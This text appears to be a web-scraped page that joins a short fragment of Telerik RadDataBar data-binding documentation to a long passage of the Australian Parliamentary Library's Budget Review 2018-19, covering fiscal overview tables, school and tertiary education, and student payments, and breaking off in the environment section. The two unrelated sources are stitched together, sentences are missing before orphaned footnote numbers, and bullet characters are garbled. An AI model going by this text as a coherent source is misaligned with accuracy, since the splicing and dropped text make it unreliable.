Note that RadDataBar doesn't have an ItemsSource property since it is a single bar and needs a single value to work.
On the other hand RadStackedDataBar requires a collection of values - the number of items in the collection determines the number of bars that will be visualized in stack.
When bound to a list of business objects, you should set the name of the property from the business object that will provide the value for the bars. For the purpose RadStackedDataBar and RadStacked100Databar expose the ValuePath property.
When run this code will produce the following result. | https://docs.telerik.com/devtools/silverlight/controls/raddatabar/databinding | CC-MAIN-2018-43 | en | refinedweb |
ISSN 2203-5249
RESEARCH PAPER SERIES, 2017-18 23 MAY 2018
Budget Review 2018-19 Research Branch
Contents
The Budget as a whole
Overview ...................................................................................................................... 3
Education
School education and early learning .......................................................................... 12
Tertiary education ...................................................................................................... 15
Student payments ...................................................................................................... 19
Environment, science and energy
Environment ............................................................................................................... 22
Energy......................................................................................................................... 25
Science and technology ............................................................................................. 28
Economics and finance
Personal income tax cuts and the Medicare levy ...................................................... 31
Targeting the black economy ..................................................................................... 38
Black Economy Standing Taskforce ............................................................................ 44
Black economy measures: limits on cash payments.................................................. 47
Tobacco ...................................................................................................................... 49
Infrastructure expenditure ........................................................................................ 51
Law, justice and immigration
Legal aid and legal assistance services ....................................................................... 57
Responding to elder abuse ........................................................................................ 63
Immigration ................................................................................................................ 66
Budget Review 2018-19 2
Foreign affairs, defence and security
Foreign affairs and Official Development Assistance ................................................ 70
Defence budget overview .......................................................................................... 73
Defence capability ...................................................................................................... 76
Cyber policy ................................................................................................................ 80
National security overview ........................................................................................ 83
Health, ageing and disability
Medicare and hospital funding .................................................................................. 86
Rural health workforce .............................................................................................. 89
Medicines ................................................................................................................... 93
Mental health ............................................................................................................. 96
Aged care ................................................................................................................... 99
National Disability Insurance Scheme ...................................................................... 103
Indigenous affairs
Indigenous affairs: education, employment, and community safety ...................... 106
Indigenous affairs: health, housing and other measures ........................................ 109
Media and the arts
Funding for the national broadcasters .................................................................... 113
Public sector
Public sector efficiencies, staffing, and administrative arrangements .................... 115
Selected public sector ICT initiatives ....................................................................... 119
Data sharing and release.......................................................................................... 123
Social services and welfare
Welfare expenditure: an overview .......................................................................... 125
‘Finances for a longer life’ measures ....................................................................... 128
Veterans’ Affairs ....................................................................................................... 131
Workforce participation measures .......................................................................... 134
Extending mutual obligation—court-ordered fines and arrest warrants ................ 138
Budget Review 2018-19 3
Overview Economics Section
This brief provides an overview of the key fiscal and economic numbers from the 2018-19 Budget.
A substantial improvement in the forecast economic and fiscal position since the 2017-18 Mid-Year Economic and Fiscal Outlook (MYEFO) is due largely to upward revisions to tax receipts driven by employment and GDP growth.
The Government is now forecasting that the Budget will return to an underlying cash balance surplus of $2.2 billion (0.1 per cent of GDP) in 2019-20. This is one year earlier than was forecast in the 2017-18 MYEFO. The surplus is expected to grow to $16.6 billion (0.8 per cent of GDP) in 2020-21 and build to at least 1 per cent of GDP over the medium term.
This improved fiscal position is primarily the result of improvements in underlying economic parameters (parameter variations)—most notably higher GDP and employment forecasts, which are expected to result in higher taxation receipts and lower payments over the forward estimates period.
Additional policy decisions taken by the Government in the 2018-19 Budget are expected to have a net negative impact on the Budget over the forward estimates period, offsetting some of the improvement in the underlying fiscal position as a result of parameter variations.
Figure 1: impact of underlying parameter and policy variations since the 2017-18 MYEFO
Note: UCB = underlying cash balance
The Government’s medium-term fiscal strategy (tax receipts <23.9%) The Government’s medium-term fiscal strategy is to achieve budget surpluses, on average, over the course of the economic cycle. The budget repair strategy is designed to deliver budget
Budget Review 2018-19 4
surpluses building to at least 1 per cent of GDP as soon as possible, consistent with the medium-term fiscal strategy.1
A new component of the Government’s medium-term strategy in the 2018-19 Budget is a commitment to ‘maintaining a sustainable tax burden consistent with the economic growth objective, including through maintaining the tax-to-GDP ratio at or below 23.9 per cent of GDP’.2 Taxation receipts are expected to grow to 23.9 per cent of GDP by the end of the forward estimates.
A number of commentators have questioned the economic rationale for the adoption of this ratio; noting that, in combination with the budget repair strategy, it gives the Government limited fiscal policy flexibility. As a result of these self-imposed constraints on revenue, future budget surpluses are likely to be small unless there are significant cuts to expenditure.3
Views on the economic estimates As the improvement in the Australian government’s fiscal position is heavily reliant on improvement in the underlying economic parameters, this outcome is sensitive to considerable uncertainty.
A number of commentators have remarked upon the underlying economic assumptions used in the Budget. EY and the Grattan Institute argue that the forecasts are ‘optimistic’:
The economic growth forecasts underpinning the budget are on the optimistic side. The budget projects a return to 3% trend growth, supported by an ongoing recovery in business investment, stronger household spending and a continuing public infrastructure spend. 4
[and].
5
Deloitte highlight the uncertainties about the Budget’s underlying assumptions:
The new plan may work, but it is vulnerable to economic and budgetary conditions. If the economy takes a dive, then the Budget outlook would dive alongside it. And the extended period of a promised-but-never-materialised return to surplus may linger even longer. 6
Global risks The Government acknowledges that there are also global risks that may have a bearing on the Budget forecasts:
Globally, these risks are broadly balanced in the short term, although they are tilted to the downside in the longer term. Key risks include a faster-than-expected tightening of monetary policy, geopolitical tensions and policy uncertainty in relation to trade protectionism. More broadly, a very sharp
1 Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, Statement 3, p. 3-7. 2. Ibid.
3. D Richardson and B Browne, The arbitrary 23.9 per cent tax revenue to GDP figure: from a convenient assumption to a ‘speed limit’, Australia Institute, Briefing note, April 2018; National Australia Bank (NAB), Federal Budget 2018-19, May 2018. 4. EY, Federal Budget 2018: Punting on growth, May 2018. 5. B Coates and D Wood (Grattan Institute), ‘Budget 2018: built on good fortune, relying on luck’, Inside Story, 9 May 2018. 6. Deloitte, The intersection of politics and prudence: Australian Federal Budget 2018-19, May 2018.
Budget Review 2018-19 5
adjustment in financial markets, which might occur from a range of factors including elevated debt levels in a number of economies, would pose a risk to both global and domestic activity. 7
Headline Numbers Economic numbers There are a few considerable changes to the Government’s assumptions around major economic parameters since the 2017-18 MYEFO (see Table 1). These upwards revisions are predominately in the 2017-18 financial year, which means that they have cumulative effects across the forward estimates period. The changes are as follows:
⢠Real GDP growth for 2017-18 has been revised up to 2.75 per cent from 2.5 per cent.
⢠Nominal GDP growth in 2017-18 has been revised up to 4.25 per cent from 3.5 per cent (but revised down for 2018-19 by 0.25 per cent).
⢠Employment growth in 2017-18 has been revised upwards by 1 per cent to 2.75 per cent.
Government forecasts of growth in the Wage Price Index are unchanged.
Table 1: growth in key economic parameters at 2018-19 Budget relative to 2017-18 MYEFO Outcomes Forecasts Projections
2016-17 2017-18 2018-19 2019-20 2020-21 2021-22
Real GDP 2.1 2.75 3 3 3 3
Change since MYEFO 0.1 0.25 0 0 0 n/a
Nominal GDP 5.9 4.25 3.75 4.75 4.5 4.5
Change since MYEFO 0.1 0.75 -0.25 0.25 -0.25 n/a
CPI 1.9 2 2.25 2.5 2.5 2.5
Change since MYEFO 0 0 0 0 0 n/a
Wage Price Index 1.9 2.25 2.75 3.25 3.5 3.5
Change since MYEFO 0 0 0 0 0 n/a
Employment 1.9 2.75 1.5 1.5 1.25 1.25
Change since MYEFO 0 1 0 0.25 0 n/a
Unemployment 5.6 5.5 5.25 5.25 5.25 5
Change since MYEFO 0 0 0 0 0 n/a
Sources: Australian Government, Mid-Year Economic and Fiscal Outlook 2017-18, p. 3; Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, Statement 1, p. 1-10.
The Reserve Bank of Australia has forecast year-end real GDP growth of 2.75 per cent for 2017-18, but it expects stronger growth of 3.5 per cent in 2018-19 before falling to 3.0 per cent in 2019- 20.8
Fiscal numbers The underlying cash balance is forecast to fall to a deficit of $14.5 billion (0.8 per cent of GDP) in 2018-19, and to return to a surplus of $2.2 billion (0.1 per cent of GDP) in 2019-20 (see Table 2 and Figure 2).
7. Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, Statement 1, p. 1-9. 8. Reserve Bank of Australia, Statement on Monetary Policy, May 2018.
Budget Review 2018-19 6
Table 2: underlying cash balance Actual Estimates Projections
2017-18 2018-19 2019-20 2020-21 2021-22 Total
Underlying cash balance ($b) -18.2 -14.5 2.2 11.0 16.6 15.3
Per cent of GDP -1.0 -0.8 0.1 0.5 0.8
Source: Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, Statement 3, p. 3-5.
Figure 2: underlying cash balance
Source: Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, Statement 11, Historical Australian Government Data, Table 1, p. 11-6.
The structural budget balance—which removes those factors which have a temporary impact on revenues and expenditures—is estimated to improve from a deficit of 1.25 per cent of GDP in 2018-19 to a series of surpluses from 2020-21.
Total general government sector receipts are estimated to be $473.7 billion (24.9 per cent of GDP) in 2018-19, rising to $554.0 billion (25.5 per cent of GDP) in 2021-22 (see Table 3 and Figure 3).
Table 3: total general government sector receipts Actual Estimates Projections
2017-18 2018-19 2019-20 2020-21 2021-22 Total
Receipts ($ b) 445.1 473.7 503.7 525.5 554.0 2 056.8
Per cent of GDP 24.3 24.9 25.3 25.2 25.5
Source: Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, Statement 3, p. 3-10.
Budget Review 2018-19 7
Figure 3: payments and receipts
Source: Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, Statement 11: Historical Australian Government Data, Table 1, p. 11-6.
Tax receipts are estimated to be $440.5 billion (23.1 per cent of GDP) in 2018-19 and $465.5 billion (23.3 per cent of GDP) in 2019-20, increasing to a projected $519.6 billion (23.9 per cent of GDP) by 2021-22. This projection is consistent with the updated medium-term fiscal strategy, which includes the maintenance of a tax-to-GDP ratio at or below 23.9 per cent of GDP.
General government sector payments are estimated to fall as a share of GDP, from 25.4 per cent of GDP in 2018-19 to 24.7 per cent of GDP in 2021-22 (see Table 4 and Figure 3).
Table 4: general government sector payments Actual Estimates Projections
2017-18 2018-19 2019-20 2020-21 2021-22 Total
Payments ($b) 459.9 484.6 497.5 514.5 537.3 2 034.0
Per cent of
25.1 25.4 25.0 24.7 24.7
Source: Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, Statement 3, p. 3-10.
General government net capital investment is expected to be $4.9 billion in 2018-19 (0.3 per cent of GDP), $4.8 billion higher than net capital investment in 2017-18. This change is due to funding associated with the implementation of the 2016 Defence White Paper.9 Over the four years to 2021-22, net capital investment in defence is projected to total $25.3 billion. Net capital investment in almost all other functions is projected to decline.10
9. Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, Statement 6, p. 6-46. 10. Ibid., Table 20, p. 6-48.
Budget Review 2018-19 8
General government sector net debt is estimated to reach 18.4 per cent of GDP in 2018-19, before falling 14.7 per cent of GDP in 2021-22. It is projected to continue falling to 5.2 per cent of GDP by 2027-28 (see Table 5 and Figure 4).11
Table 5: net and gross debt Actual Estimates Projections
2017-18 2018-19 2019-20 2020-21 2021-22
Net debt ($b) 341.0 349.9 344.0 334.3 319.3
Per cent of GDP 18.6 18.4 17.3 16.1 14.7
Gross debt ($b) 533.0 561.0 579.0 566.0 578.0
Per cent of GDP 29.0 29.5 29.0 27.2 26.6
Source: Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, Statement 11, p. 11-12 and p. 11-14.
Figure 4: net debt
Source: Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, Statement 11: Historical Australian Government Data, Table 4, p. 11-12.
Gross debt (the face value of CGS on issue) is projected to rise from 29.4 per cent of GDP in 2018- 19 to 26.6 per cent of GDP by the end of the forward estimates, before falling to $532 billion by 2028-29 (see Table 5).12
General government sector net interest payments are estimated to fall from $14.5 billion (0.8 per cent of GDP) in 2018-19 to $12.2 billion (0.6 per cent of GDP) in 2019-20, remaining at 0.6 per cent of GDP up to 2021-22 (see Table 6).13
11. Ibid., Statement 11, p. 11-12. 12. Ibid., Statement 3, p. 3-16.
Budget Review 2018-19 9
Net financial worth, an indicator of fiscal sustainability, has improved over the forward estimates relative to 2017-18 MYEFO. It is estimated to be 25.4 per cent of GDP in 2018-19, improving marginally to 24.2 per cent of GDP in 2019-20. Another component of the medium term fiscal strategy is ‘improving net financial worth over time’. Government projections suggest that net financial worth will be 7.5 per cent of GDP by 2028-29.14
Table 6: net financial worth and net interest payments Actual Estimates Projections
2017-18 2018-19 2019-20 2020-21 2021-22
Net interest payments ($ billion) 13.1 14.5 12.2 12.4 12.2
Per cent of GDP 0.7 0.8 0.6 0.6 0.6
Net financial worth ($ billion) -466.3 -482.9 -482.1 -471.3 -453.9
Per cent of GDP -25.4 -25.4 -24.2 -22.6 -20.9
Source: Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, Statement 3, p. 3-16.
Key revenue and expense measures Table 7 lists the major revenue measures—and Table 8, the major expense measures—with a significant impact in the 2018-19 Budget.
Table 7: major policies—revenue measures
2017-18 ($m) 2018-19 ($m)
2019-20 ($m) 2020-21 ($m)
2021-22 ($m)
Total ($m)
Personal Income Tax Plan - -360 -4 120 -4 420 -4 500 -13 400
Personal Income Tax - retaining the Medicare levy rate at 2 per cent
- -400 -3 550 -4 250 -4 600 -12 800
Black Economy Package - Combatting Illicit Tobacco
- -15 3 251 148 193 3 577
Better targeting the Research and Development Tax Incentive - 314 641 764 719 2 438
Black Economy Package - New and enhanced ATO enforcement against the Black Economy
- 340 467 533 578 1 917
Personal Income Tax - ensuring individuals meet their tax obligations
- 180 258 277 277 991
Protecting Your Super Package - changes to insurance in superannuation
- - 224 228 245 697
A firm stance on tax and superannuation debts
- -149 -152 -156 -160 -617
13. Ibid.
14. Ibid., p. 3-17.
Budget Review 2018-19 10
2017-18 ($m) 2018-19 ($m)
2019-20 ($m) 2020-21 ($m)
2021-22 ($m)
Total ($m)
Black Economy Package - further expansion of taxable payments reporting
- -4 47 264 299 606
Superannuation - better integrity over deductions for personal contributions
- 89 109 110 120 427
Source: Australian Government, Budget Measures: budget paper no. 2: 2018-19, Table 1, pp. 1-6.
Table 8: major policies—expense measures 2017-18
($m)
2018-19 ($m) 2019-20 ($m)
2020-21 ($m) 2021-22 ($m)
Total ($m)
Supporting Our Hospitals - National Health Agreement - public hospital funding
- -50 - -331 -597 -977
Pharmaceutical Benefits Scheme - new and amended listings -17 -175 -221 -255 -102 -770
Great Barrier Reef 2050 Partnership Program
-444 -10 -5 -8 -11 -478
Remote Indigenous Housing in the Northern Territory - -110 -110 -110 -110 -440
National Research Infrastructure Investment Plan - implementation of Government response
-199 -6 -26 -76 -87 -393
Funding to Boost Services in the Northern Territory -260 - - - - -260
More Choices for a Longer Life - finances for a longer life 0 -21 -93 -75 -70 -259
Managing the Skilling Australians Fund - revised implementation arrangements
-250 - - - - -250
National School Chaplaincy Programme - continuation
- -62 -62 -62 -62 -247
Building Better Regions Fund - round three - -40 -108 -48 -10 -207
Source: Australian Government, Budget Measures: budget paper no. 2: 2018-19, Table 2, pp. 47-68.
Budget Review 2018-19 11
Revenue 2018-19
$b Percentage
Personal income tax 222.9 45.9
Company & resource rent taxes 92.6 19.0
Sales tax (incl. GST) 72.1 14.8
Fuels excise 19.5 4.0
Other taxes 44.9 9.2
Non-tax revenue 34.1 7.0
Total 486.1 100.0
Figure 5: revenue in 2018-19
Source: Australian Government, Budget strategy and outlook: budget
paper no. 1: 2018-19, Budget overview, 8 May 2018, Statement 6,
Appendix A, p. 6-50.
Government expenses by function 2018-19
Function $b Percentage
Social security and welfare 176.0 36.0
Health 78.8 16.1
Education 34.7 7.1
Defence 31.2 6.4
General public services 23.1 4.7
All other functions 46.8 9.6
Other purposes 98.0 20.0
Total 488.6 100.0
Figure 6: expenses by function
Source: Australian Government, Budget strategy and outlook: budget
paper no. 1: 2018-19, Budget overview, 8 May 2018, Statement 5, Table
10, p. 5-21.
Budget Review 2018-19 12
School education and early learning Marilyn Harrington
School funding expenditure The 2018-19 Budget embeds the new school funding arrangements that were put in place by the 2017-18 Budget and later modified through the passage of the Australian Education Amendment Act 2017.15 The increased funding for these later changes for the years 2017-18 to 2020-21 was provided in the Mid-year Economic and Fiscal Outlook 2017-18.16.17.18
Indexation of base per student funding).
The National School Chaplaincy Programme.20
15..
16. S Morrison (Treasurer) and M Cormann (Minister for Finance), Mid-year economic and fiscal outlook 2017-18, p. 146. 17. The budget figures in this article have been taken from the following document unless otherwise sourced: Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19. 18. Australian Government, Final budget outcome 2012-13, p. 95. 19. Information about indexation arrangements is from M Harrington, Australian Education Amendment Bill 2017, op. cit., p. 10. 20. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 92; S Birmingham (Minister for Education and
Training) and K Andrews (Minister for Vocational Education and Skills), Guaranteeing essential services—reform and
Budget Review 2018-19 13
Moreover, the Treasurer in his budget speech announced that it would be funded on a ‘permanent basis’.21
The Government has also announced that the program will have a new focus—school chaplains will be required to upgrade their skills by undertaking cyber-bullying training provided by the eSafety Commissioner.22
Budget reaction.23 The National Catholic Education Commission (NCEC) is also disappointed that the Budget has not addressed its concerns, particularly in relation to the various reviews that have been undertaken (see below).24
The NSCP’s renewal has been welcomed by the non-government schools sector, but criticised by various secular groups.25 The Australian Education Union argues that the funds should have been used instead for ‘professional school counselling services, ongoing professional development for principals and teachers and student well being programs’.26
The future of school funding The Budget does not contain any school education measures as a result of the recent Gonski review which examined school reform or the Review into Regional, Rural and Remote Education.27.28.
Early learning The extension of the National Partnership Agreement Universal Access to Early Childhood Education (the NP), that was first announced in February this year, is the most significant of the early learning budget measures.29 The NP, which provides funding for preschool programs for children in the year before full-time school, has once again been extended by one year only. The
investment for better education opportunities, media release, 8 May 2018; Australian Government, Budget 2018-19: budget overview, p. 34. 21. S Morrison (Treasurer), Budget speech 2018-19, p. 11. 22. Birmingham and Andrews, op. cit. 23. T Plibersek (Shadow Minister for Education and Training), Biggest threat to public schools: Liberals’ massive cuts, media release, 20 March 2018. 24. National Catholic Education Commission (NCEC), Budget doesn’t address Catholic schools’ concerns, media release, 9 May 2018; R Urban and R Deutrom, ‘Catholic backlash builds as funding concerns sidestepped’, The Australian, 10 May 2018. 25. Independent Schools Council of Australia, Chaplaincy program extension welcomed, media release, 9 May 2019; NCEC, op. cit.; P Karp, ‘School chaplain program’s $247m budget extension rejected by teachers’ union’, The Guardian, 9 May 2018. 26. Australian Education Union, Turnbull’s Budget fails our children, media release, 8 May 2018. 27. Department of Education and Training (DET), ‘Review to Achieve Educational Excellence in Australian Schools’ and ‘Independent Review into Regional, Rural and Remote Education’, DET websites. 28. DET, ‘Review of the socio-economic status (SES) score methodology’, DET website. 29. S Birmingham (Minister for Education and Training), Preschool funding boost, media release, 3 February 2018.
Budget Review 2018-19 14
Government is providing $441.6 million over two years from 2018-19 to extend the NP for the 2019 calendar year and to undertake the National Early Childhood and Care Collection in early 2020.30
This yearly extension of the NP has been the practice since 2015 in spite of continuing concerns by the early childhood education sector about the uncertainty that this creates—there are also calls for the NP to be extended to three-year-olds.31 The Shadow Minister for Early Childhood Education and Development, Amanda Rishworth, has warned that funding uncertainty may mean ‘fees will have to rise or services will have to close’.32.33
None of the budget measures discussed in this article require separate legislation.
30. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 91. 31. For example: Early Childhood Australia, Missed opportunity on quality early learning, media release, 8 May 2018; Mitchell Institute, Funding announcement hurts preschools, media release, 5 February 2018. 32. A Rishworth (Shadow Minister for Early Childhood Education and Development), Budget leaves families in limbo without
funding certainty, media release, 9 May 2018. 33..
Budget Review 2018-19 15
Tertiary education Hazel Ferguson
This is not a major budget for tertiary education. However the Government has addressed a number of outstanding issues arising from earlier announcements in both vocational education and training (VET) and higher education.
Vocational education and training The most significant 2018-19 budget measure in VET addresses the future of the apprenticeship-focused Skilling Australians Fund (SAF), which was announced in the 2017-18 Budget, but has not yet been implemented.34
Skilling Australians Fund announcement: 2017-18 Budget In the 2017-18 Budget, the Government announced a four-year National Partnership Agreement worth approximately $1.5 billion, to replace the expired National Partnership Agreement on Skills Reform.35 The new Agreement was funded from 2017-18, subject to negotiations with the states and territories. However, funding for the measure was based on revenue from a levy on skilled visas from March 2018, which is yet to commence.36 The legislation to give effect to the levy passed Parliament on 9 May 2018.37
With the National Partnership Agreement on Skills Reform having expired on 30 June 2017, skills training providers have raised concerns about the delay in implementing the SAF and uncertainty about the stability of revenue from the levy.38 This has been particularly pressing given declining apprenticeship numbers and trade skill shortages in recent years.39
2018-19 budget measure—‘Managing the Skilling Australians Fund’ The 2018-19 Budget makes a number of changes to manage the delayed implementation of the SAF:
⢠$250.0 million is provided in 2017-18, to allow the SAF to commence
⢠an additional $50.0 million is available each year from 2017-18 to 2021-22, to be shared between states and territories—the first year is only available to those that sign on to participate in the SAF by 7 June 2018 and
⢠the proposed Agreement with the states and territories will be delayed by one year, shifting the four-year Agreement from 2017-18 to 2020-21, to 2018-19 to 2021-22.40
The total value of the SAF remains the same as in the 2017-18 budget announcement (although running over five years rather than four), at approximately $1.5 billion.41 However, the funding for
34. Information on the Skilling Australians Fund (SAF) is available from Department of Education and Training (DET), ‘Skilling Australians Fund’, DET website. 35. Australian Government, Federal financial relations: budget paper no. 3: 2017-18, p. 35. 36. Migration Amendment (Skilling Australians Fund) Bill 2018. 37. At the time of writing, these bills, the Migration Amendment (Skilling Australians Fund) Bill 2018, and Migration (Skilling
Australians Fund) Charges Bill 2017, are yet to receive Royal Assent. 38.. 39. As discussed in C Petrie, H Ferguson and H Sherrell, Migration Amendment (Skilling Australians Fund) Bill 2017 and Migration (Skilling Australians Fund) Charges Bill 2017, Bills digest, 76, 2017-18, Parliamentary Library, Canberra, 2018, pp. 5-6. 40. Australian Government, Budget 2018-19: budget overview, 2018, Appendix C: major initiatives, p. 34; Australian
Government, ‘Part 2: expense measures’, Budget measures: budget paper no. 2: 2018-19, p. 90. 41. Australian Government, Federal financial relations: budget paper no. 3: 2017-18, p. 35; Australian Government, Federal financial relations: budget paper no. 3: 2018-19, p. 35.
Budget Review 2018-19 16
2017-18 will not be included in the Agreement, leaving total funding for the National Partnership on the Skilling Australians Fund at $1.2 billion.42.43
In the 2017-18 Budget, total funding available through the SAF in 2017-18 was $350.0 million, with only $90.0 million of this coming from revenue from the levy. 44 Therefore, while the 2018-19 Budget makes available $300 million in 2017-18, it does not appear that this whole amount is new spending.
The full implementation of the SAF remains subject to negotiation with the states and territories.
Higher education The Mid-year Economic and Fiscal Outlook 2017-18 (MYEFO) addressed the major outstanding funding issue in higher education by announcing that unlegislated reform measures from the 2017-18 Budget would not be pursued.45 Unlike these recent higher education reform announcements the most significant MYEFO saving was achieved without legislation through a 2018 and 2019 freeze on funding for Commonwealth Supported Places (CSPs).46 CSPs provide subsidised higher education courses for domestic students, primarily at undergraduate level. The challenge in higher education in this budget has therefore been in balancing between strategic growth in some areas, particularly regional universities, with the overall pause in demand-driven funding.
Response to the Review into Regional, Rural and Remote Education The 2018-19 Budget provides $96.1 million over four years from 2018-19 to implement the Government’s response to the higher education components of the Review into Regional, Rural and Remote Education.47.48 According to the Department of Education and Training (DET), RSHs will ‘provide infrastructure such as study spaces, video conferencing, computing facilities and internet access, as well as pastoral and academic support for students studying via distance at partner
42. Australian Government, Federal financial relations: budget paper no. 3: 2017-18, p. 35; Australian Government, Federal financial relations: budget paper no. 3: 2018-19, , p. 35; Department of Education and Training (DET), Skilling Australians Fund, fact sheet, DET website, 2018.
43. H Sherrell, ‘Immigration overview’, Budget Review 2018-19, Research paper series, 2017-18, Parliamentary Library, Canberra, 2018. 44. Australian Government, Portfolio budget statements 2017-18: budget related paper no. 1.5: Home Affairs Portfolio, p. 15. 45. Australian Government, Mid-year Economic and Fiscal Outlook 2017-18 (MYEFO), pp. 143-4. 46.. 47. Australian Government, ‘Part 2: expense measures’, op. cit., p. 94. 48. Ibid., pp. 81-82; DET, ‘Access and Participation’, DET website.
Budget Review 2018-19 17
universities.’49 The response also includes $53.9 million for expanded access to Youth Allowance, which is discussed elsewhere in the Budget Review 2018-19.50 The Regional Universities Network has supported the Government’s response but ‘looks forward to a further Government response to the Halsey review recommendations’.51 There is no response, for instance, to the Review’s recommendations to expand the affordability and availability of VET in the regions.52
Other support for regional universities.53 No additional funding for medical CSPs is committed in the Education and Training Portfolio for this measure, although a new pool of medical CSPs is being created from 2021.54 Instead, places are being made available through partnerships with universities which already have medical places allocated. More information on the Stronger Rural Health Strategy, including the Murray-Darling medical schools network, is available in elsewhere in the Budget Review 2018-19.55
Cost recovery and regulation.56 The new TEQSA charge offsets the cost of an
additional $24.3 million over four years from 2018-19 for TEQSA to manage increased workload resulting from growth in provider applications, and to address contract cheating.57 Innovative Research Universities, while welcoming the Budget overall, is ‘disappointed with “pointless” new
university charges’.58.59 The Budget
49. DET, op. cit. 50. M Klapdor, ‘Student payment changes’, Budget Review 2018-19, Research paper series, 2017-18, Parliamentary Library, Canberra, 2018. 51. Regional Universities Network (RUN), RUN: budget a step in the right direction for regional students and universities, media
release, 8 May 2018. 52. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.5: Education and Training Portfolio, p. 10; J Halsey, Independent Review into Regional, Rural and Remote Education, Department of Education and
Training, Canberra, 2018, p. 56. 53. Australian Government, ‘Part 2: expense measures’, op. cit., p. 106. 54. DET, ‘A pool of medical Commonwealth supported places (CSPs) to support innovative medical initiatives’, DET website. 55. M Biggs, ‘Rural health workforce’, Budget Review 2018-19, Research paper series, 2017-18, Parliamentary Library, Canberra,
2018.
56. DET, ‘HERI Budget overview 18-19’, DET website. 57. Australian Government, ‘Part 2: expense measures’, op. cit., p. 95. 58. Innovative Research Universities, IRU welcomes budget investment in research but disappointed with 'pointless' new university charges, media release, 9 May 2018. 59. Australian Skills Quality Authority (ASQA), ‘Fees and Charges’, ASQA website.
Budget Review 2018-19 18
commits $18.6 million over four years from 2018-19 to support ASQA to move to full cost recovery. This is estimated to achieve $52.7 million in revenue, or a net saving of $34.1 million.60
An additional $1.0 million in 2018-19 has also been allocated to the Office of the Commonwealth Ombudsman to support the workload of the VET Student Loans Ombudsman in managing and investigating student complaints about VET FEE-HELP and VET Student Loans providers.61
Legislation would be required to apply new charges to providers.
60. Australian Government, ‘Part 2: expense measures’, op. cit., p. 85. 61. Australian Government, ‘Part 2: expense measures’, op. cit., p. 96.
Budget Review 2018-19 19
Student payments Michael Klapdor
The 2018-19 Budget includes a number of measures to increase assistance to Indigenous students and students from regional and rural areas and to prevent students from accessing student payments if they are undertaking courses not approved for the Higher Education Loan Program (HELP).
50 years of ABSTUDY The Budget includes a $38.1 million measure over four years to provide additional assistance to Indigenous secondary school students who receive assistance through the Aboriginal and Torres Strait Islander Assistance Scheme (ABSTUDY) program.62 The ABSTUDY program assists Aboriginal or Torres Strait Islander students and apprentices where they need to travel for study.63’.64 The grants scheme was initially limited to tertiary students. A scheme for secondary students was introduced from 1970 and the two were amalgamated into ABSTUDY in 1988.65:
⢠combine the boarding supplement rate with the Living Allowance at the Away from Home rate for all ABSTUDY recipients under 16 years of age—rates will increase by around $5,258.60 per year for almost 1,900 students
⢠implement new travel arrangements for secondary students receiving Fares Allowance with increased trips and greater flexibility for students travelling to or from locations other than home and school
⢠provide more frequent payments to boarding providers to support students who move to a new school or boarding arrangement and encourage providers to ensure continued attendance66
⢠streamline the ABSTUDY approval process for secondary school scholarships
⢠no longer apply the maintenance (child support) income test to some ABSTUDY awards. 67
Most of the changes will not require legislation as ABSTUDY is administered through policy guidelines approved by the Minister for Social Services. The maintenance income test changes require legislation.
62. The budget figures in this brief have been taken from the following document unless otherwise sourced: Australian Government, Budget measures: budget paper no. 2: 2018-19, pp. 94-95, 170-171. 63. Department of Human Services (DHS), ‘ABSTUDY’, DHS website, last updated 7 May 2018. 64. Department of Social Services (DSS), ABSTUDY Policy Manual, DSS, Canberra, 1 May 2018, p. 6. 65. Ibid., pp. 6-7. 66. 67. DSS, Student measures, factsheet, DSS website, May 2018, pp. 1-2; DHS, 50 years of ABSTUDY — strengthening ABSTUDY for
secondary students, factsheet, DHS, May 2018, pp. 1-4.
Budget Review 2018-19 20
Access to Youth Allowance for rural students:
⢠over a 14 month period since leaving secondary school, earn 75 per cent or more of Wage Level A of the National Training Wage Schedule included in a modern award (for someone who finished school in 2016 this would be equivalent to $24,042) or
⢠work at least 15 hours a week for at least two years since leaving secondary school. 68.69.70 However, the report of the Halsey Review did not raise the income limit as a matter of concern nor did it recommend amending the limit.71
The measure will allow more regional students from families with high incomes to qualify for Youth Allowance. The measure will cost $53.9 million over four years from 2018-19 and will require legislation.
Limiting student payments to HELP-approved courses.72 The new limits for students in higher education builds on a 2017-18 budget measure which limited access to student payments for vocational education and training (VET) students to those studying courses approved for VET student loans.73 Affected student payments are Youth Allowance, Austudy, ABSTUDY and the Pensioner Education Supplement.
68. DSS, ‘3.2.5.80 YA & DSP - Self-supporting through Paid Employment’, Guide to social security law, DSS website, last reviewed 7 May 2018. 69. J Gillard (Minister for Education), Government delivers on Youth Allowance, media release, 16 March 2010. 70. Australian Government, op. cit., p. 94. 71. J Halsey, Independent review into regional, rural and remote education: final report, Department of Education and Training,
2018.
72. C Porter (Minister for Social Services), Improving outcomes for students through a stronger student payments system, media release, 16 October 2017. 73. Australian Government, Budget measures: budget paper no. 2: 2017-18, p. 144.
Budget Review 2018-19 21).74
The measure has already been implemented via a legislative instrument which commenced on 1 January 2018.75 The Government estimates that up to 2,000 students will be affected by the changes.76 Student payment recipients studying at non-HELP approved providers were protected from the measure for the duration of their current course.
74. Tertiary Education Quality and Standards Agency (TEQSA), ‘Search the National Register’, TEQSA website, 2017; Australian Government, ‘Providers that offer Commonwealth assistance’, StudyAssist website. 75. Student Assistance (Education Institutions and Courses) Amendment Determination 2017 (No. 3). 76. Porter, op. cit.
Budget Review 2018-19 22
Environment Bill McCormick
Great Barrier Reef 2050 Partnership Program The Reef was the stand-out environmental item in this Budget, although parts of the package were announced beforehand. The Government has committed $535.8 million over five years from 2017-18 to accelerate the delivery of the Reef 2050 Plan.77 In January 2018 the Government announced $57.9 million (contained in additional Budget Estimates of February 2018) to provide:
